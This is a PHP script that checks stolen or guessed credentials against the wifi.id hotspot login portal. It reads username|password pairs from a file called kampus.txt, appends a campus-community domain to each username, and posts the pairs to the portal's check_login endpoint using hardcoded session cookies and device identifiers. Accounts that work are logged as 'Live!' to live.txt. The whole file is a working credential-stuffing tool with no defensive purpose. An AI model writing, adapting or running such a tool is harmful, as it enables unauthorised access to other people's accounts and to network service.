<?php

function login($username,$password){
	
// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, 'https://welcome2.wifi.id/authnew/login/check_login.php?ipc=10.200.166.131&gw_id=WAG-D4-KBU&mac=34:e1:2d:97:6f:fd&redirect=http://www.msftconnecttest.com/redirect&wlan=SLOGLD00661/TLK-WI32433877-0001:@wifi.id');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=8".$username."@komunitas.ut&password=".$password."&landURL=");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');

$headers = array();
$headers[] = 'Host: welcome2.wifi.id';
$headers[] = 'Cookie: _qg_fts=1558620391; QGUserId=3620222058546729; nvg51046=a037db7464020da84eeac54d109|0_144; _ga=GA1.2.1283334518.1560171461; SERVERID=wpwifi4; PHPSESSID=8k18dl4rqvt8dsebngiutfs4a5; _gid=GA1.2.1470655679.1567671170; default_wifi=qr4i95evu4mck44npb3v8j029tjeae4e';
$headers[] = 'Accept: application/json, text/javascript, */*; q=0.01';
$headers[] = 'Origin: https://welcome2.wifi.id';
$headers[] = 'X-Requested-With: XMLHttpRequest';
$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36';
$headers[] = 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8';
$headers[] = 'Referer: https://welcome2.wifi.id/login/?gw_id=WAG-D4-KBU&client_mac=34:e1:2d:97:6f:fd&wlan=SLOGLD00661/TLK-WI32433877-0001:@wifi.id&sessionid=0302FFFF7802D8D8-5D63E7E7&redirect=http://www.msftconnecttest.com/redirect';
$headers[] = 'Accept-Language: en-ID,en-US;q=0.9,en;q=0.8,id;q=0.7';
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$result = curl_exec($ch);
if (curl_errno($ch)) {
    echo 'Error:' . curl_error($ch);
}
curl_close($ch);

	return $result;
}
$fn = fopen("kampus.txt","r");
  
  while(! feof($fn))  {

    $result = fgets($fn);
	$regex = '/[^|]+/';
    $cekList = preg_match_all($regex, $result,$userlist);
    $usr = $userlist[0][0];
    $pwd = $userlist[0][1];
	
	$cek = json_decode(login($usr, $pwd));
	var_dump($cek);
	$res = $cek->result;
	
	if ($res != 0) {
	echo "Live! ==> ".$usr.",".$pwd."\n";
	file_put_contents("live.txt", "Live! ==> ".$usr.",".$pwd."\n", FILE_APPEND);
	sleep (2);
	} else {
	echo "Die! ==> ".$usr.",".$pwd."\n";
	file_put_contents("die.txt", "Die! ==>" . $usr . "," . $pwd . "\n", FILE_APPEND);
	sleep (2);
	}
  }

  fclose($fn);
